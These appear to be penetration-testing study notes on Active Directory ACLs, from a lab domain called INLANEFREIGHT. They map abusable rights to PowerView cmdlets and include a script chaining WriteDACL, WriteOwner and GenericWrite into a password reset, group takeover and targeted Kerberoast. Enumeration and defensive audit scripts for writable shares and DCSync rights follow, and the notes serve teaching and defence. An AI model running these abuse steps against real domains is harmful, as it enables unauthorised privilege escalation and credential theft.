Domain ACLs
Access Control Lists (ACLs)
Every securable object in Active Directory (users, groups, computers, OUs, the domain head itself) carries a security descriptor holding two ACLs, each a list of Access Control Entries (ACEs).
Types of ACLs
Discretionary Access Control List (DACL)
Lists the ACEs that grant or deny specific rights over the object to security principals (users, groups, computers). A missing (null) DACL means everyone has full access; an empty DACL grants access to nobody.
System Access Control List (SACL)
Lists the ACEs that tell the system which access attempts (successful, failed or both) to record in the Security event log. A SACL grants no access by itself; it only drives auditing.
ACL Abuse
Each row pairs a right held over a user or group object with the PowerView cmdlet that abuses it. WriteOwner and WriteDACL are stepping stones (take ownership, or edit the DACL to grant yourself the right you actually need); the others are abused directly.

Right held by the attacker                 PowerView abuse primitive
ForceChangePassword                        Set-DomainUserPassword
Add Members (WriteProperty on member)      Add-DomainGroupMember
GenericAll                                 Set-DomainUserPassword or Add-DomainGroupMember
GenericWrite                               Set-DomainObject
WriteOwner                                 Set-DomainObjectOwner
WriteDACL                                  Add-DomainObjectACL
AllExtendedRights                          Set-DomainUserPassword or Add-DomainGroupMember
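The chain below is an added example, not part of the original notes, showing how the rows of the table are combined in practice with PowerView: WriteDACL on a user is turned into a password reset, WriteOwner on a group is turned into full control and a new member, and GenericWrite on a user is used to set an SPN. The account and object names (cliff.moore, daniel.carter, Help Desk) and the password value are assumptions for illustration; the cmdlets and parameters are PowerView's own.

```powershell
# Added example: turning ACL rights from the table into concrete actions with PowerView.
# Prerequisite: PowerView is loaded in the session, e.g.   . .\PowerView.ps1
# Assumed foothold: INLANEFREIGHT\cliff.moore holds WriteDACL over daniel.carter,
# WriteOwner over the 'Help Desk' group and GenericWrite over daniel.carter.
$Me     = 'INLANEFREIGHT\cliff.moore'   # assumed
$Target = 'daniel.carter'               # assumed
$Group  = 'Help Desk'                   # assumed

# 1. WriteDACL on a user: add an ACE granting ourselves the ResetPassword (User-Force-Change-Password)
#    extended right, then reset the password without knowing the old one.
Add-DomainObjectAcl -TargetIdentity $Target -PrincipalIdentity $Me -Rights ResetPassword -Verbose
$NewPass = ConvertTo-SecureString 'Winter2024!' -AsPlainText -Force   # assumed value
Set-DomainUserPassword -Identity $Target -AccountPassword $NewPass -Verbose

# 2. WriteOwner on a group: an owner can always rewrite the DACL, so take ownership,
#    grant ourselves full control, then add a member.
Set-DomainObjectOwner -Identity $Group -OwnerIdentity $Me -Verbose
Add-DomainObjectAcl -TargetIdentity $Group -PrincipalIdentity $Me -Rights All -Verbose
Add-DomainGroupMember -Identity $Group -Members 'cliff.moore' -Verbose

# 3. GenericWrite on a user: write an arbitrary servicePrincipalName so a TGS for the
#    account can be requested and cracked offline (targeted Kerberoast).
Set-DomainObject -Identity $Target -Set @{serviceprincipalname='nonexistent/BLAHBLAH'} -Verbose

# Clean-up once finished: remove the SPN and the ACE we added, restoring the original state
# as far as possible (the ownership change and password reset must be reverted manually).
Set-DomainObject -Identity $Target -Clear serviceprincipalname -Verbose
Remove-DomainObjectAcl -TargetIdentity $Target -PrincipalIdentity $Me -Rights ResetPassword -Verbose
```

Every write above generates directory changes (event 5136 with object auditing enabled, 4724 for the reset, 4728/4732 for the group addition), so on an engagement record what was changed and revert it.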
Enumerating ACLs
Get-ACL (ACL for a Single Domain User, ActiveDirectory module)
Code
Import-Module ActiveDirectory   # provides the AD: PSDrive that Get-ACL reads below
(Get-ACL "AD:$((Get-ADUser daniel.carter).distinguishedname)").access | ? {$_.IdentityReference -eq "INLANEFREIGHT\cliff.moore"}
All Principals (Users or Groups) with WriteProperty or GenericAll Rights Over the Target User
Code
(Get-ACL "AD:$((Get-ADUser daniel.carter).distinguishedname)").access | ? {$_.ActiveDirectoryRights -match "WriteProperty" -or $_.ActiveDirectoryRights -match "GenericAll"} | Select IdentityReference,ActiveDirectoryRights -Unique | ft -W
Get-DomainObjectAcl (PowerView: full ACL of one object, GUIDs resolved to right/attribute names)
Code
Get-DomainObjectAcl -Identity harry.jones -Domain inlanefreight.local -ResolveGUIDs
Find-InterestingDomainAcl (PowerView: ACEs across the domain granted to principals that are not default high-privilege accounts)
Code
Find-InterestingDomainAcl -Domain inlanefreight.local -ResolveGUIDs
File Share ACLs
Code
Get-NetShare -ComputerName SQL01
Example
Name        Type        Remark         ComputerName
----        ----        ------         ------------
ADMIN$      2147483648  Remote Admin   SQL01
C$          2147483648  Default share  SQL01
DB_backups  0                          SQL01
IPC$        2147483651  Remote IPC     SQL01
Code
Get-PathAcl "\\SQL01\DB_backups"
Example
Path              : \\SQL01\DB_backups
FileSystemRights  : Read
IdentityReference : Local System
IdentitySID       : S-1-5-18
AccessControlType : Allow

Path              : \\SQL01\DB_backups
FileSystemRights  : Read
IdentityReference : BUILTIN\Administrators
IdentitySID       : S-1-5-32-544
AccessControlType : Allow

Path              : \\SQL01\DB_backups
FileSystemRights  : Read
IdentityReference : BUILTIN\Users
IdentitySID       : S-1-5-32-545
AccessControlType : Allow

Path              : \\SQL01\DB_backups
FileSystemRights  : AppendData/AddSubdirectory
IdentityReference : BUILTIN\Users
IdentitySID       : S-1-5-32-545
AccessControlType : Allow

Path              : \\SQL01\DB_backups
FileSystemRights  : WriteData/AddFile
IdentityReference : BUILTIN\Users
IdentitySID       : S-1-5-32-545
AccessControlType : Allow

Path              : \\SQL01\DB_backups
FileSystemRights  : GenericAll
IdentityReference : Creator Owner
IdentitySID       : S-1-3-0
AccessControlType : Allow

The point to notice: BUILTIN\Users (which includes every domain user on a domain-joined host) can read the share and also add files and subdirectories to it, and whoever creates a file owns it with full control. Backups in a share that any authenticated user can write to are a classic path to credential theft or to planting files for later execution.
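The check below is an added example, not part of the original notes, that automates what the Get-PathAcl output above shows by hand: it walks the non-administrative shares on a list of hosts and reports ACEs that give low-privilege groups any write right. It uses only built-in cmdlets; Get-SmbShare over a CIM session needs WinRM to the target, whereas PowerView's Get-NetShare enumerates over MS-RPC. The host name and the list of low-privilege identities are assumptions.

```powershell
# Added example: find shares writable by low-privilege groups using built-in cmdlets only.
$Hosts   = @('SQL01')   # assumed target list
# Identities whose write access on a share is almost always a finding (assumed list).
$LowPriv = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users')
# Any right that lets a caller change content or permissions counts as "write" here.
$WriteMask = [System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, WriteAttributes, WriteExtendedAttributes, Delete, DeleteSubdirectoriesAndFiles, ChangePermissions, TakeOwnership'

function Find-WritableShares {
    param([string[]]$ComputerName, [string[]]$LowPrivIdentities, [System.Security.AccessControl.FileSystemRights]$Mask)
    foreach ($h in $ComputerName) {
        # Skip hidden/administrative shares (ADMIN$, C$, IPC$ ...); requires WinRM/CIM to the host.
        try { $shares = Get-SmbShare -CimSession $h -ErrorAction Stop | Where-Object { $_.Name -notmatch '\$$' } }
        catch { Write-Warning "Cannot enumerate shares on $h : $($_.Exception.Message)"; continue }
        foreach ($s in $shares) {
            $path = "\\$h\$($s.Name)"
            # Get-Acl over the UNC path returns the NTFS DACL of the share root, as Get-PathAcl does.
            try { $acl = Get-Acl -Path $path -ErrorAction Stop }
            catch { Write-Warning "Cannot read ACL on $path"; continue }
            foreach ($ace in $acl.Access) {
                if ($ace.AccessControlType -ne 'Allow') { continue }
                $id = $ace.IdentityReference.Value
                # 'Domain Users' is matched by suffix so the domain prefix does not matter.
                if ($LowPrivIdentities -notcontains $id -and $id -notmatch '\\Domain Users$') { continue }
                if ([int]($ace.FileSystemRights -band $Mask) -ne 0) {
                    [pscustomobject]@{ Path = $path; Identity = $id; Rights = $ace.FileSystemRights; Inherited = $ace.IsInherited }
                }
            }
        }
    }
}

Find-WritableShares -ComputerName $Hosts -LowPrivIdentities $LowPriv -Mask $WriteMask | Format-Table -AutoSize
```

Against the DB_backups share above this reports the two BUILTIN\Users entries (AppendData/AddSubdirectory and WriteData/AddFile) and nothing else, since Creator Owner is not in the low-privilege list and the remaining ACEs are read-only.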
Enumerate DCSync Users
A common attack called DCSync impersonates a domain controller over the directory replication protocol (MS-DRSR) to pull password hashes for any account. It requires a principal to hold, on the domain naming context (the domain head object), both of the following control access rights:
Replicating Directory Changes (DS-Replication-Get-Changes)
Replicating Directory Changes All (DS-Replication-Get-Changes-All)
A third right, Replicating Directory Changes In Filtered Set (DS-Replication-Get-Changes-In-Filtered-Set), is only needed for attributes in the RODC filtered attribute set and is not sufficient for DCSync on its own. GenericAll, or an ExtendedRight ACE with no specific object type, on the domain head implies all of them. By default only Administrators, Domain Admins, Enterprise Admins, SYSTEM, Domain Controllers and Enterprise Domain Controllers end up with the pair, so any other principal that has both is a finding.
Code
# Get-ObjectACL and Convert-SidToName are the older PowerView names; the current dev branch calls them Get-DomainObjectAcl and ConvertFrom-SID.
# Note: 'Replication-Get' also matches the Filtered-Set right, which alone does not allow DCSync; confirm that Get-Changes and Get-Changes-All are both present for each SID returned.
$dcsync = Get-ObjectACL "DC=inlanefreight,DC=local" -ResolveGUIDs | ? { ($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ObjectAceType -match 'Replication-Get')} | Select-Object -ExpandProperty SecurityIdentifier | Select -ExpandProperty value
Convert-SidToName $dcsync
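The script below is an added example, not part of the original notes, that does the DCSync enumeration above (and the single-object Get-ACL enumeration earlier on the page) with the ActiveDirectory module alone, for hosts where PowerView is blocked. Unlike the one-liner it resolves the replication-right GUIDs itself, treats GenericAll and a wildcard ExtendedRight ACE as implying the replication rights, and only reports principals that hold both DS-Replication-Get-Changes and DS-Replication-Get-Changes-All, flagging anything outside the default set. The three schema GUIDs are the well-known values for these control access rights; the list of expected principals is an assumption based on a default domain.

```powershell
# Added example: list DCSync-capable principals on the domain head with the AD module only.
Import-Module ActiveDirectory

# Well-known rightsGuid values of the replication control access rights (the ACE's ObjectType).
$ReplRights = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
    '89e95b76-444d-4c62-991a-0facbeda640c' = 'DS-Replication-Get-Changes-In-Filtered-Set'
}
$Domain   = Get-ADDomain
$Acl      = Get-Acl -Path "AD:$($Domain.DistinguishedName)"
$nb       = $Domain.NetBIOSName
# Principals that hold replication rights in a default domain (assumed baseline); others are findings.
$Expected = @('NT AUTHORITY\SYSTEM', 'NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS', 'BUILTIN\Administrators',
              "$nb\Domain Controllers", "$nb\Domain Admins", "$nb\Enterprise Admins")

$GenericAll    = [int][System.DirectoryServices.ActiveDirectoryRights]::GenericAll
$ExtendedRight = [int][System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight
$Findings = @{}   # principal name -> set of replication rights held

foreach ($ace in $Acl.Access) {
    if ($ace.AccessControlType -ne 'Allow') { continue }
    $who = $ace.IdentityReference.Value
    # Translate raw SIDs that Get-Acl could not resolve (foreign or deleted principals).
    if ($who -match '^S-1-') {
        try { $who = ([System.Security.Principal.SecurityIdentifier]$who).Translate([System.Security.Principal.NTAccount]).Value } catch {}
    }
    if (-not $Findings.ContainsKey($who)) { $Findings[$who] = New-Object 'System.Collections.Generic.HashSet[string]' }
    $rights = [int]$ace.ActiveDirectoryRights

    # GenericAll on the domain head includes every extended right, replication included.
    if (($rights -band $GenericAll) -eq $GenericAll) {
        $ReplRights.Values | ForEach-Object { [void]$Findings[$who].Add($_) }
        continue
    }
    if (($rights -band $ExtendedRight) -ne 0) {
        if ($ace.ObjectType -eq [guid]::Empty) {
            # ExtendedRight with no ObjectType grants all extended rights (this is how Domain Admins get DCSync).
            $ReplRights.Values | ForEach-Object { [void]$Findings[$who].Add($_) }
        }
        elseif ($ReplRights.ContainsKey($ace.ObjectType.ToString())) {
            [void]$Findings[$who].Add($ReplRights[$ace.ObjectType.ToString()])
        }
    }
}

# DCSync needs Get-Changes AND Get-Changes-All together; the Filtered-Set right alone is not enough.
$Findings.GetEnumerator() | Where-Object {
    $_.Value.Contains('DS-Replication-Get-Changes') -and $_.Value.Contains('DS-Replication-Get-Changes-All')
} | ForEach-Object {
    [pscustomobject]@{
        Principal  = $_.Key
        Rights     = (($_.Value | Sort-Object) -join ', ')
        Unexpected = ($_.Key -notin $Expected)
    }
} | Sort-Object Unexpected -Descending | Format-Table -AutoSize
```

Rows with Unexpected = True are the ones to investigate: a service account or helpdesk group that can DCSync is equivalent to Domain Admin. Defensively, the same query run on a schedule and diffed against a known-good baseline catches an attacker who grants themselves these rights for persistence.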